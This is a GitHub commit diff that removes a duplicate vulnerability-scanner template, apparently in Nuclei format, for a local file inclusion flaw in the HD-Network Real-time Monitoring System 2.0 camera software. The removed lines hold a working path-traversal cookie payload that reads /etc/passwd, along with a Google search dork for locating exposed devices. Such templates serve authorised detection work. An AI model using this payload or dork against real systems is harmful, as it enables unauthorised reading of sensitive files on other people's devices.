removing duplicate template

patch-1
Sandeep Singh 2022-02-15 23:43:06 +05:30 committed by GitHub
parent be309f08e0
commit f705c2debd
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 0 additions and 28 deletions

View File

@ -1,28 +0,0 @@
id: hdnetwork-realtime-lfi
info:
name: HD-Network Real-time Monitoring System 2.0 - Local File Inclusion
author: Evan Rubinstein
severity: high
description: Instances of HD-Netowrk Real-time Monitoring System version 2.0 are vulnerable to a Local File Inclusion (LFI) vulnerability which allows remote unauthenticate attackers to view important, confidnetial information.
reference: https://www.exploit-db.com/exploits/50588
metadata:
google-dork: intitle:"HD-Network Real-time Monitoring System V2.0"
tags: hdnetwork,lfi,iot,camera
requests:
- raw:
- |
GET /language/lang HTTP/1.1
Host: {{Hostname}}
Referer: {{BaseURL}}
Cookie: s_asptitle=HD-Network%20Real-time%20Monitoring%20System%20V2.0; s_Language=../../../../../../../../../../../../../../etc/passwd; s_browsertype=2; s_ip=; s_port=; s_channum=; s_loginhandle=; s_httpport=; s_sn=; s_type=; s_devtype=
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200